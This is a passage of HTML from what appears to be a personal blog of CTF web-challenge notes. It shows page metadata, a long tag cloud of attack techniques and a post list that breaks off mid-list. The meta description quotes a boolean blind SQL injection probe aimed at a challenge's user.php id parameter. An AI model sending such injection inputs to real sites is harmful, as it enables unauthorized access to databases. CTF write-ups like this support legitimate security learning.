<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  <title>CISCN2019华北赛区DayWeb2-ikun | MIXBP</title>
  <meta name="keywords" content=" 刷题笔记 , python反序列化 , jwt密钥爆破 , pickle ">
  <meta name="description" content="CISCN2019华北赛区DayWeb2-ikun | MIXBP">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
<meta name="description" content="SUCTF2018-MultiSQL原文链接 进去题目页面。  查看网页源代码发现有注册登录页面  随便注册一个用户，发现跳转到了&#x2F;user&#x2F;user.php  查看用户信息,发现有传参&#x2F;user&#x2F;user.php?id&#x3D;2  在?id&#x3D;后存在一个sql盲注,我们来尝试一下?id&#x3D;2^(if(ascii(mid(user(),1,1))&gt;0,0,1))判断存在注入，2异或0还是为2">
<meta property="og:type" content="article">
<meta property="og:title" content="SUCTF2018-MultiSQL">
<meta property="og:url" content="https://mixbp.github.io/master/2025/04/27/SUCTF2018-MultiSQL/index.html">
<meta property="og:site_name" content="MIXBP">
<meta property="og:description" content="SUCTF2018-MultiSQL原文链接 进去题目页面。  查看网页源代码发现有注册登录页面  随便注册一个用户，发现跳转到了&#x2F;user&#x2F;user.php  查看用户信息,发现有传参&#x2F;user&#x2F;user.php?id&#x3D;2  在?id&#x3D;后存在一个sql盲注,我们来尝试一下?id&#x3D;2^(if(ascii(mid(user(),1,1))&gt;0,0,1))判断存在注入，2异或0还是为2">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://mixbp.github.io/image/SUCTF2018-MultiSQL-1.png">
<meta property="og:image" content="https://mixbp.github.io/image/SUCTF2018-MultiSQL-2.png">
<meta property="og:image" content="https://mixbp.github.io/image/SUCTF2018-MultiSQL-3.png">
<meta property="og:image" content="https://mixbp.github.io/image/SUCTF2018-MultiSQL-4.png">
<meta property="article:published_time" content="2025-04-27T08:25:20.000Z">
<meta property="article:modified_time" content="2025-04-27T09:17:52.989Z">
<meta property="article:author" content="MIXBP">
<meta property="article:tag" content="刷题笔记">
<meta property="article:tag" content="getshell">
<meta property="article:tag" content="布尔盲注">
<meta property="article:tag" content="堆叠注入">
<meta property="article:tag" content="sql预处理">
<meta property="article:tag" content="selet into outfile">
<meta property="article:tag" content="char绕过">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://mixbp.github.io/image/SUCTF2018-MultiSQL-1.png">


<link rel="icon" href="/img/avatar.jpg">

<link href="/css/style.css?v=1.1.0" rel="stylesheet">

<link href="/css/hl_theme/atom-light.css?v=1.1.0" rel="stylesheet">

<link href="//cdn.jsdelivr.net/npm/animate.css@4.1.0/animate.min.css" rel="stylesheet">

<script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
<script src="/js/titleTip.js?v=1.1.0" ></script>

<script src="//cdn.jsdelivr.net/npm/highlightjs@9.16.2/highlight.pack.min.js"></script>
<script>
    hljs.initHighlightingOnLoad();
</script>

<script src="//cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js"></script>



<script src="/js/iconfont.js?v=1.1.0" ></script>

<meta name="generator" content="Hexo 7.3.0"></head>
<div style="display: none">
  <input class="theme_disqus_on" value="false">
  <input class="theme_preload_comment" value="">
  <input class="theme_blog_path" value="">
  <input id="theme_shortcut" value="true" />
  <input id="theme_highlight_on" value="true" />
  <input id="theme_code_copy" value="true" />
</div>



<body>
<aside class="nav">
    <div class="nav-left">
        <a href="/"
   class="avatar_target">
    <img class="avatar"
         src="/img/avatar.jpg"/>
</a>
<div class="author">
    <span>MIXBP</span>
</div>

<div class="icon">
    
        
            <a title="github"
               href="https://mixbp.github.io/"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-github"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="email"
               href="mailto:2439254357@qq.com"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-email"></use>
                    </svg>
                
            </a>
        
    
        
            <a title="qq"
               href="http://wpa.qq.com/msgrd?v=3&uin=2439254357&site=qq&menu=yes"
               target="_blank">
                
                    <svg class="iconfont-svg" aria-hidden="true">
                        <use xlink:href="#icon-qq"></use>
                    </svg>
                
            </a>
        
    
</div>



    <a class="more-menus">更多菜单</a>



<ul>
    <li>
        <div class="all active" data-rel="All">All
            
                <small>(115)</small>
            
        </div>
    </li>
    
</ul>
<div class="left-bottom">
    <div class="menus">
        
            
            
                <a class="dynamic-menu "
                   target="_self"
                   
                   href="https://mixbp.github.io/">MIXBP</a>
        
            
                <a class="dynamic-menu "
                   target="_blank"
                        
                   href="https://mixbp.github.io/">github</a>
        
    </div>
    <div>
        
            <a class="about  hasFriend  site_url"
               
               href="/about">About</a>
        
        <a style="width: 50%"
                
                                           class="friends">Friends</a>
        
    </div>
</div>
<input type="hidden" id="yelog_site_posts_number" value="115">
<input type="hidden" id="yelog_site_word_count" value="204.9k">
<div style="display: none">
    <span id="busuanzi_value_site_uv"></span>
    <span id="busuanzi_value_site_pv"></span>
</div>

    </div>
    <div class="nav-right">
        <div class="friends-area">
    <div class="friends-title">
        Links
        <i class="iconfont icon-left"></i>
    </div>
    <div class="friends-content">
        <ul>
            
            <li><a target="_blank" href="https://mixbp.github.io/">MIXBP</a></li>
            
        </ul>
    </div>
</div>
        <div class="title-list">
    <div class="right-top">
        <div id="default-panel">
            <i class="iconfont icon-search" data-title="search shortcut key i"></i>
            <div class="right-title">All</div>
            <i class="iconfont icon-file-tree" data-title="switch to outline view shortcut key w"></i>
        </div>
        <div id="search-panel">
            <i class="iconfont icon-left" data-title="return"></i>
            <input id="local-search-input" autocomplete="off"/>
            <label class="border-line" for="input"></label>
            <i class="iconfont icon-case-sensitive" data-title="case sensitive"></i>
            <i class="iconfont icon-tag" data-title="label"></i>
        </div>
        <div id="outline-panel" style="display: none">
            <div class="right-title">outline</div>
            <i class="iconfont icon-list" data-title="switch to article list"></i>
        </div>
    </div>

    <div class="tags-list">
    <input id="tag-search" />
    <div class="tag-wrapper">
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>;%00截断代替#和-</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>.haccess</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>.htaccess新知识</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>\转义单引号</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>+%09绕过空格过滤</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>+%0a绕过单行匹配正则</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>+%0a绕过正则</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>$_SERVER[‘PHP_SELF’]</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>$_SERVER['QUERY_STRING']</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>${phpinfo()}</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>报错注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>比赛复现</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>闭合</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>布尔盲注</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>代码审计</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>动态调用方法</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>逗号过滤</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>短标签绕过</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>堆叠注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>二次注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>反序列化</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>反序列化逃逸</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>反引号执行命令</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>经典盲文</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>空格过滤绕过</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>路径穿越</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>明文攻击</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>命令执行</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>命令执行时间盲注</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>摩斯密码</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>目录穿越</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>内存马</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>逆推加密</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>取反绕过</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>取反绕过单双引号过滤</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>任意文件下载</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>日志包含</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>弱口令密码</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>时间盲注</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>时间帧隐写</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>刷题笔记</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>特殊变量名传参</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>条件竞争</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>图片隐写</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>文件包含</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>文件读取</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>文件上传</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>无回显命令执行</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>无列名盲注</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>无列名注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>无字母数字汉字取反构造webshell</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>无字母数字rce</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>无字母数字RCE</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>限制字符种类绕过</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>信息搜集</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>学习笔记</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>压缩文件修复</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>异或盲注</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>异或绕过</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>异或绕过进阶</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>原型链污染</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>长度过滤绕过</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>正则表达式</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>正则匹配查询</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>字符串逃逸</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>字符串增加逃逸</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>做题笔记</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Apache SSI 远程命令执行漏洞</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>assert和eval</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>basename()函数</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>binwalk文件提取</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>bottle</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>bottle框架</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>burpsuite爆破密码</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>char绕过</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>chr函数构造命令</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Client-ip头绕过</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>cms</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>create_function()</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>CVE</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>data://伪协议</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>data伪协议</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>delimiter更改sql语句结束符</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>docker</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Error/Exception</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>escapeshellarg()和escapeshellcmd()、单引号逃逸</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>escapeshellarg和escapeshellcmd函数的绕过</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>extract</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>extract覆盖函数</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>file伪协议</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>filter伪协议</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>finfo_file</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Flask</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>fuzz测试</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>fuzz字典</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>gc回收</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>getimagesize</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>getshell</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>git文件泄露与复原</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>githacker</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>glob函数</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>handler读表</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>HTML</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>http协议</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>idna编码特性</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>intval</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>js代码审计</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>jsfuck编码</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>json绕过</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>jwt密钥爆破</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>jwt身份伪造</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>jwt伪造</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>linux</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>linux find -name模糊查询文件</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Linux特殊文件</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>MariaDB数据库</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>md5</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>md5碰撞</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>misc</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>mt_srand伪随机数漏洞</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>MySQL</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>nginx</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>nmap</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>parse_str绕过</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>parse_url绕过</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>payload构造</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>PCRE回溯次数绕过</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>perl语言漏洞</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>php</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>php_mt_seed工具</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>PHP_SESSION_UPLOAD_PROGRESS</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>php7 segment fault 特性</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>php标签</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>php代码审计</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>php反序列化</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>PHP反序列化漏洞</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>php特性</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>php伪协议</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>PHP原生类</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>pickle</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>pickle反序列化漏洞</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>preg_match</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>python</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>Python-Flask框架审计</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>python代码审计</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>python反弹shell</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>python反序列化</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>python脚本编写</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>python内存马</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>RC4加密</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>rce</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>RCE</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>regexp注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>require_once</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>reverse</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ruby模块注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ruby预定义字符</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>select load_file读取文件</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>selet into outfile</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>session文件包含</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>sha1绕过</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>shell写入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>sql加号运算注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>sql盲注</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>sql语句闭合</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>sql预处理</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>sql注入</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ssrf</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ssti</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>steghide隐写</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>str_replace</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>svg</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>swp泄露</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>sys数据库</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>thinkphp v6.0任意文件操作漏洞</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>unicode</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>upload</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>vm沙箱逃逸</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>waf绕过</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>webshell</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>xss</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>xss漏洞</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>xxe</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>xxe编码绕过</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>xxe漏洞waf绕过</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>zip伪加密</a>
            </li>
        
            <li class="article-tag-list-item">
                <i class="iconfont icon-tag"></i><a>ziperello工具暴力破解</a>
            </li>
        
    </div>

</div>

    
    <div id="local-search-result">

    </div>
    
    <nav id="title-list-nav">
        
        
        <a  class="All "
           href="/2025/04/27/SUCTF2018-MultiSQL/"
           data-tag="刷题笔记,getshell,布尔盲注,堆叠注入,sql预处理,selet into outfile,char绕过"
           data-author="" >
            <span class="post-title" title="SUCTF2018-MultiSQL">SUCTF2018-MultiSQL</span>
            <span class="post-date" title="2025-04-27 16:25:20">2025/04/27</span>
        </a>
        
        
        <a  class="All "
           href="/2025/04/27/GYCTF2020-Ez-Express/"
           data-tag="js代码审计,原型链污染"
           data-author="" >
            <span class="post-title" title="GYCTF2020-Ez_Express">GYCTF2020-Ez_Express</span>
            <span class="post-date" title="2025-04-27 15:41:22">2025/04/27</span>
        </a>
        
        
        <a  class="All "
           href="/2025/04/27/GYCTF2020-Easyphp/"
           data-tag="代码审计,sql注入,反序列化,字符串增加逃逸"
           data-author="" >
            <span class="post-title" title="GYCTF2020-Easyphp">GYCTF2020-Easyphp</span>
            <span class="post-date" title="2025-04-27 00:31:03">2025/04/27</span>
        </a>
        
        
        <a  class="All "
           href="/2025/04/25/N1CTF2018-eating-cms/"
           data-tag="代码审计,文件包含,信息搜集,文件上传,rce,parse_url绕过,parse_str绕过"
           data-author="" >
            <span class="post-title" title="N1CTF2018-eating_cms">N1CTF2018-eating_cms</span>
            <span class="post-date" title="2025-04-25 20:43:52">2025/04/25</span>
        </a>
        
        
        <a  class="All "
           href="/2025/04/24/SCTF2019-FlagShop/"
           data-tag="刷题笔记,ruby模块注入,jwt伪造,ruby预定义字符"
           data-author="" >
            <span class="post-title" title="SCTF2019-FlagShop">SCTF2019-FlagShop</span>
            <span class="post-date" title="2025-04-24 23:14:49">2025/04/24</span>
        </a>
        
        
        <a  class="All "
           href="/2025/04/24/HarekazeCTF2019-AvatarUploader/"
           data-tag="代码审计,upload,getimagesize,finfo_file"
           data-author="" >
            <span class="post-title" title="HarekazeCTF2019-AvatarUploader">HarekazeCTF2019-AvatarUploader</span>
            <span class="post-date" title="2025-04-24 14:37:07">2025/04/24</span>
        </a>
        
        
        <a  class="All "
           href="/2025/04/24/%E7%BE%8A%E5%9F%8E%E6%9D%AF2020-easyphp/"
           data-tag="代码审计,.htaccess新知识"
           data-author="" >
            <span class="post-title" title="羊城杯2020-easyphp">羊城杯2020-easyphp</span>
            <span class="post-date" title="2025-04-24 00:06:00">2025/04/24</span>
        </a>
        
        
        <a  class="All "
           href="/2025/04/22/ISITDTU2019-EasyPHP/"
           data-tag="刷题笔记,异或绕过进阶,无字母数字rce,限制字符种类绕过"
           data-author="" >
            <span class="post-title" title="ISITDTU2019-EasyPHP">ISITDTU2019-EasyPHP</span>
            <span class="post-date" title="2025-04-22 12:19:26">2025/04/22</span>
        </a>
        
        
        <a  class="All "
           href="/2025/04/22/BSidesCF2019-SVGMagic/"
           data-tag="xxe,svg"
           data-author="" >
            <span class="post-title" title="BSidesCF2019-SVGMagic">BSidesCF2019-SVGMagic</span>
            <span class="post-date" title="2025-04-22 00:29:11">2025/04/22</span>
        </a>
        
        
        <a  class="All "
           href="/2025/04/21/CSAWQual2019-Web-Unagi/"
           data-tag="xxe,upload,xxe漏洞waf绕过,xxe编码绕过"
           data-author="" >
            <span class="post-title" title="CSAWQual2019-Web_Unagi">CSAWQual2019-Web_Unagi</span>
            <span class="post-date" title="2025-04-21 17:27:53">2025/04/21</span>
        </a>
        
        
        <a  class="All "
           href="/2025/04/21/%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%982020-Greatphp/"
           data-tag="PHP原生类,取反绕过,php标签,Error/Exception"
           data-author="" >
            <span class="post-title" title="极客大挑战2020-Greatphp">极客大挑战2020-Greatphp</span>
            <span class="post-date" title="2025-04-21 16:19:05">2025/04/21</span>
        </a>
        
        
        <a  class="All "
           href="/2025/04/20/EasyBypass/"
           data-tag="php代码审计,rce,闭合"
           data-author="" >
            <span class="post-title" title="EasyBypass">EasyBypass</span>
            <span class="post-date" title="2025-04-20 21:47:46">2025/04/20</span>
        </a>
        
        
        <a  class="All "
           href="/2025/04/20/HFCTF2020-JustEscape/"
           data-tag="vm沙箱逃逸"
           data-author="" >
            <span class="post-title" title="HFCTF2020-JustEscape">HFCTF2020-JustEscape</span>
